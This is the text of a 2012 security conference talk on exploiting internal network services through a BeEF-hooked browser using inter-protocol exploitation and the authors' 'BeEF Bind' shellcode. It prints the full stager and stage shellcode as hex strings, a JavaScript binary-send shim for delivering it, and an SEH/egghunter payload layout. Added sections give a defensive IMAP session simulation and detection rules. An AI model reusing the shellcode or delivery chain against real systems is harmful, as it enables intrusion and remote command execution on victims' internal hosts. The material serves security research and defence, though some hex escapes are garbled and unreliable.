Rooting your internals
Exploiting Internal Network Vulns via the Browser Using BeEF Bind

Michele Orru
Ty Miller

RuxCon 2012
About Us

Ty Miller, PureHacking
  • CTO
  • http://projectshellcode.com/
  • "The Shellcode Lab" famous BlackHat training
About Us

Michele Orru, Trustwave SpiderLabs
  • BeEF lead core developer
  • Application Security researcher
  • Ruby, Javascript and OpenBSD fan
About The Talk

   • Current situation and traditional browser attack vectors
   • BeEF and Inter-Protocol Exploitation
   • The BeEF Bind shellcode
   • How the shellcode delivery and exploitation works
   • Demo fun, current limitations and...
Current situation
traditional browser attack vectors


  •   Aimed at compromising the browser itself, or its plugins

  •   Sandboxes and exploit mitigation techniques make our life
      difficult

  •   0-day browser exploits are extremely expensive (Grugq said :-)
Current situation
Browser vulnerability exploitation



  •   Is the victim's web browser patched?

  •   Do you have $100k to spend on a single 0-day browser exploit?

  •   How many useful browser exploits are available?
Current situation
Browser plugin exploitation

  •   Is the plugin patched or vulnerable?

  •   How reliable are the plugin exploits?

      •   some dependent upon browser version and plugin version

      •   some dependent on exact plugin build version

      •   most current browsers no longer leak exact plugin info

  •   Java-based exploits (also for ROP chains) require user intervention
      on many current browsers (e.g. Chrome)
Current situation
Cross Site Scripting

  •   Misunderstood, not patched, found in 90% of application pentests

  •   Full DOM manipulation

  •   SOP restrictions, additional HTTP headers restrictions, CSP

  •   In fact, alert(1) is the most used attack vector

  •   Oh, no sorry, also stealing cookies...
Current situation
traditional browser attack vectors

     Internal server vulnerabilities are
     sitting there bored and lonely...
Idea flow
read top to bottom

Wade: My IPEC research was cool, we should research further

Ty: I developed a new staging shellcode that acts like a WebServer

Michele: Awesome, let me do some research and let's port it to BeEF
The scary BeEF
changing browser attack vectors

•   Imagine a framework like Metasploit,
    but for browser-based attacks

•   Powerful platform for Client-side
    pwnage, XSS post-exploitation and
    general abuse of the victim browser's
    security context.

•   The framework allows the penetration
    tester to select specific modules
    (in real-time) to target each browser,
    and therefore each context.
The scary BeEF
changing browser attack vectors


•   Through a simple XSS or Phishing page, with BeEF we
    can hook victim browsers and control them entirely
    with Javascript

•   No more alert(1) crap

•   Features like ManInTheBrowser, Tunneling Proxy and
    remote exploits are all implemented in (relatively)
    simple Javascript
Revitalizing IPEC
Inter-Protocol Exploitation

•   Back in 2006/2007 Wade Alcorn researched what he called
    Inter-Protocol exploitation

•   Exploit ‘tolerant’ protocol implementations, which do not
    drop the client connection after N errors

•   A properly encoded POST request can be sent to the target:

    •   HTTP request headers are parsed as BAD COMMANDS

    •   HTTP request body is parsed as VALID COMMANDS

    •   HTTP request body also contains shellcode. FUN STARTS
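The point above is that IPEC only works against "tolerant" services that keep the connection open while the HTTP header lines arrive as garbage commands, so the body (the real commands and the shellcode) is eventually parsed. The following is an added example, not code from the talk or from BeEF: a simulated pre-authentication command loop for an IMAP-style line protocol that refuses a session whose first line is an HTTP request line, and otherwise drops the connection after a fixed number of consecutive unparseable commands, so the header lines exhaust the error budget before the body is ever read. The command set, the two sample sessions and the threshold are constructed assumptions.

```python
import re

# Constructed sample: what an IMAP listener sees when a browser is made to send
# a cross-origin HTTP POST at it. Header lines are junk to IMAP; the body would
# carry real IMAP commands.
IPEC_SESSION = [
    "POST / HTTP/1.1",
    "Host: mail.internal.example:143",
    "User-Agent: Mozilla/5.0 (constructed)",
    "Content-Type: text/plain",
    "Content-Length: 64",
    "",
    "a1 LOGIN user pass",
    "a2 SELECT INBOX",
]

# Constructed sample of a legitimate client session.
NORMAL_SESSION = [
    "a1 CAPABILITY",
    "a2 LOGIN user pass",
    "a3 SELECT INBOX",
    "a4 LOGOUT",
]

# Simplified IMAP command vocabulary and tag syntax (assumption, not the RFC grammar).
KNOWN_COMMANDS = {"CAPABILITY", "NOOP", "LOGOUT", "LOGIN", "SELECT",
                  "FETCH", "LIST", "STARTTLS"}
TAG = re.compile(r"^[A-Za-z0-9]+$")
HTTP_REQUEST_LINE = re.compile(r"^(GET|POST|PUT|HEAD|OPTIONS|DELETE) \S+ HTTP/1\.[01]$")


def parse_command(line):
    """Return the command word of a 'TAG COMMAND ...' line, or None if the line
    is not a well-formed, known IMAP command."""
    parts = line.split(" ", 2)
    if len(parts) < 2 or not TAG.match(parts[0]):
        return None
    cmd = parts[1].upper()
    return cmd if cmd in KNOWN_COMMANDS else None


def handle_session(lines, max_errors=3, check_request_line=True):
    """Simulate the pre-auth command loop of a hardened line-based server.

    Returns (dropped, reason, lines_consumed). With check_request_line the
    session is refused as soon as the first line is an HTTP request line;
    without it, the consecutive-error limit alone still drops the connection
    while it is still inside the HTTP headers, before the body is parsed.
    """
    if check_request_line and lines and HTTP_REQUEST_LINE.match(lines[0]):
        return True, "http-request-line", 1

    consecutive_errors = 0
    for consumed, line in enumerate(lines, start=1):
        if parse_command(line) is None:
            consecutive_errors += 1
            if consecutive_errors >= max_errors:
                return True, "too-many-bad-commands", consumed
        else:
            consecutive_errors = 0
    return False, "ok", len(lines)


if __name__ == "__main__":
    print("normal:", handle_session(NORMAL_SESSION))
    print("ipec:", handle_session(IPEC_SESSION))
    print("ipec, no request-line check:",
          handle_session(IPEC_SESSION, check_request_line=False))
```

The error budget matters more than the request-line check: a request line can be obscured by the attacker's choice of verb or path, but the stack of mandatory browser headers cannot be, so a server that stops tolerating unknown commands after a few of them never reaches the attacker-controlled body.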
Revitalizing IPEC
Inter-Protocol Exploitation: limitations


•   Limitations:

    •   SOP and cross-domain restrictions

    •   PortBanning

    •   HTTP Headers size

    •   HTTP Content-Type settings

    •   After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 1

•   Limitation: SOP and cross-domain restrictions

    On Firefox and WebKit we can still ‘blindly’ send data cross-domain.
    This is (usually) enough to pwn services.
Revitalizing IPEC
Inter-Protocol Exploitation: solution 2

•   Limitation: PortBanning

    http://a.com:143/
    FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED

    Connections to various well-known ports (22/25/143/993/995/etc.) are denied.
    On Firefox, an extension can override config options:
Revitalizing IPEC
Inter-Protocol Exploitation: solution 3

•   Limitation: HTTP Headers size

    Lots of headers are automatically created by the browser (around 400 bytes).
    Most of them cannot be overridden, and cross-domain they are bigger.
    We can override some of them:
Revitalizing IPEC
Inter-Protocol Exploitation: solution 4

•   Limitation: HTTP Content-Type settings

    The original IPEC paper was using:
        Content-Type: multipart/form-data;

    Our approach uses, to save space:
        Content-Type: text/plain;
Revitalizing IPEC
Inter-Protocol Exploitation: solution 5

•   Limitation: After exploitation, back to normal out-of-browser shells?

    Not anymore, thanks to the BeEF Bind shellcode.
    You have a bind shellcode which can be totally controlled through a hooked
    browser sitting in the same victim internal network.
BeEF Bind shellcode
how it works

•   Ty created a new staging shellcode, which we called BeEF Bind

•   He was bored of reverse shells :D

    •   stager -> 299 bytes (326 after bad-char encoding)

    •   stage -> 792 bytes

•   The stager sets up a bind port on 4444/TCP to accept an HTTP POST request
    containing the raw stage in a parameter called ‘cmd’.

var stager =
    "xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" +
    "xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" +
    "x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" +
    "xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" +
    "x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" +
    "xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" +
    "xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" +
    "x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" +
    "xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" +
    "x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" +
    "x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" +
    "xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" +
    "xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" +
    "x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" +
    "x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" +
    "x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" +
    "x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" +
    "xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" +
    "x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" +
    "xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" +
    "x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" +
    "x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" +
    "xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" +
    "x37x96x26x84";
BeEF Bind shellcode
how it works

•   The stage sets up a bind port on 4444/TCP to accept HTTP POST requests
    from the web browser.

•   A set of pipes redirects the cmd.exe input and output. This lets the stage
    sit between the HTTP request and the cmd.exe process, implementing the
    web-server-style functionality.

•   The command result output is returned with the
    Access-Control-Allow-Origin: * header. After the stage is deployed, SOP is
    not a problem anymore.

var stage_allow_origin =
    "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28"
    "x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" +
    "x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" +
    "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" +
    "xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" +
    "x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" +
    "x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" +
    "x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" +
    "xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" +
    "xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" +
    "x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" +
    "x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" +
    "x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" +
    "x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" +
    "x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" +
    "xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" +
    "xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" +
    "x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" +
    "x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" +
    "x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" +
    "x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" +
    "xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" +
    "x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" +
    "xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" +
    "xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" +
    "xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" +
    "x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" +
    "x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" +
    "x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" +
    "x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" +
    "x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" +
    "x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" +
    "x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" +
    "x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" +
    "x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" +
    "xfexffxff";
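The two slides above and the IPEC slide earlier describe three things a network sensor can see: a browser sending an HTTP request at a non-HTTP service port, a browser POSTing a cmd parameter to an internal host on a port no web service is known to live on, and that host answering with Access-Control-Allow-Origin: *. The following detection logic is an added example, not code from the talk or from BeEF: it runs those three rules over constructed HTTP transaction records of the kind a sensor such as Zeek's http.log produces. The hosts, ports, allowlist and user-agent strings are constructed assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed allowlist of the internal web services that are expected to
# answer browser traffic (assumption; in practice sourced from inventory).
KNOWN_WEB_SERVICES = {("10.0.0.20", 443), ("10.0.0.21", 80)}

# Ports belonging to non-HTTP services. HTTP aimed at them is the IPEC
# signature: the request headers land on the service as garbage commands.
NON_HTTP_SERVICE_PORTS = {21, 22, 23, 25, 110, 143, 389, 993, 995}

BROWSER_UA = re.compile(r"Mozilla/")
CMD_PARAM = re.compile(r"(^|&)cmd=")


@dataclass
class HttpEvent:
    """One HTTP transaction as a sensor would record it (constructed schema)."""
    src: str
    dst: str
    dport: int
    method: str
    user_agent: str
    body: str = ""
    resp_headers: dict = field(default_factory=dict)


def evaluate(ev):
    """Return the list of rule names the event triggers (empty if benign)."""
    alerts = []
    service = (ev.dst, ev.dport)

    # Rule 1: HTTP request delivered to a port that speaks another protocol.
    if ev.dport in NON_HTTP_SERVICE_PORTS:
        alerts.append("http-request-to-non-http-service")

    # Rules 2 and 3 only concern browser traffic to services that are not
    # known web servers, i.e. the hooked-browser-to-bind-shellcode pattern.
    if service not in KNOWN_WEB_SERVICES and BROWSER_UA.search(ev.user_agent):
        if ev.method == "POST" and CMD_PARAM.search(ev.body):
            alerts.append("browser-post-cmd-to-unlisted-service")
        headers = {k.lower(): v for k, v in ev.resp_headers.items()}
        if headers.get("access-control-allow-origin") == "*":
            alerts.append("wildcard-cors-from-unlisted-service")
    return alerts


def scan(events):
    """Return {event index: alerts} for every event that triggered a rule."""
    hits = {}
    for i, ev in enumerate(events):
        alerts = evaluate(ev)
        if alerts:
            hits[i] = alerts
    return hits


# Constructed sample traffic: a workstation (10.0.1.50) browsing normally,
# then being driven to POST at the IMAP port, then talking to a bind port.
SAMPLE_EVENTS = [
    HttpEvent("10.0.1.50", "10.0.0.20", 443, "GET", "Mozilla/5.0 (constructed)"),
    HttpEvent("10.0.1.50", "10.0.0.5", 143, "POST", "Mozilla/5.0 (constructed)",
              body="a1 LOGIN x y\r\n"),
    HttpEvent("10.0.1.50", "10.0.0.5", 4444, "POST", "Mozilla/5.0 (constructed)",
              body="cmd=ipconfig",
              resp_headers={"Access-Control-Allow-Origin": "*",
                            "Content-Type": "text/html"}),
    HttpEvent("10.0.1.60", "10.0.0.21", 80, "POST", "curl/7.0 (constructed)",
              body="cmd=status"),
]

if __name__ == "__main__":
    for index, alerts in scan(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[index]
        print(f"{ev.src} -> {ev.dst}:{ev.dport} {ev.method}: {', '.join(alerts)}")
```

Rule 1 fires on the initial exploitation step regardless of what the payload does afterwards; rules 2 and 3 catch the post-exploitation channel, where the only thing distinguishing the traffic from ordinary browsing is that the destination is not a known web service and the response opens itself to every origin.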
BeEF Bind shellcode
how it works

The shellcode is also available as a Metasploit module
(screenshot: BeEF Bind MSF Payload Module)
BeEF Bind shellcode
how it works

Burp/OllyDbg DEMO
BeEF Bind shellcode
delivery and usage from within BeEF

•   Shellcode is binary data

•   Stager and Stage are delivered with XMLHttpRequest.sendAsBinary

•   For WebKit browsers that don't support sendAsBinary, the method is
    added by overriding the XHR prototype:

(figure: Stager - Stage)

XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
    // Map each character of the binary string to its low byte
    function byteValue(x) {
        return x.charCodeAt(0) & 0xff;
    }
    var ords = Array.prototype.map.call(datastr, byteValue);
    var ui8a = new Uint8Array(ords);
    // Send the raw bytes as an ArrayBuffer
    this.send(ui8a.buffer);
};
BeEF Bind shellcode
delivery and usage from within BeEF

•   We cannot know in advance the exact size
    of HTTP headers.

•   A dummy cross-domain XHR request is
    sent back to BeEF, exact size of headers is
    calculated, and exploit junk is adjusted
    accordingly.

•   Like in all exploits, a one-byte error is enough
    to break the exploit.

•   With this approach, errors are minimized.
BeEF Bind shellcode
delivery and usage from within BeEF

•   Typical SEH exploit with EggHunter, non-IPEC:

    commands + junk + shellcode + next_seh + seh + egg_hunter

•   Typical SEH exploit with EggHunter, IPEC:

    HTTP_headers + commands + (less) junk + shellcode + next_seh + seh + egg_hunter
BeEF Bind shellcode
delivery and usage from within BeEF

(screenshot: Immunity dbg view, IMAP process memory when sending the stager)
BeEF Bind shellcode
delivery and usage from within BeEF

(screenshot: Wireshark view, stager delivery)
(screenshot: Wireshark view, command delivery and results)
BeEF Bind shellcode
delivery and usage from within BeEF

(screenshot: BeEF IPEC shell (JS): set target, exec command, get results)

Ultimate fun.
High Level Architecture
from FF extension to command execution
(diagram slides)
Demo fun
from phishing to internal IMAP server compromise
Thanks

•   Wade and the other BeEF guys

•   Ty for his awesome shellcode

•   Michele for his awesome BeEF integration

•   RuxCon crew and you, attendees

•   Whoever will offer beers later...
Questions?
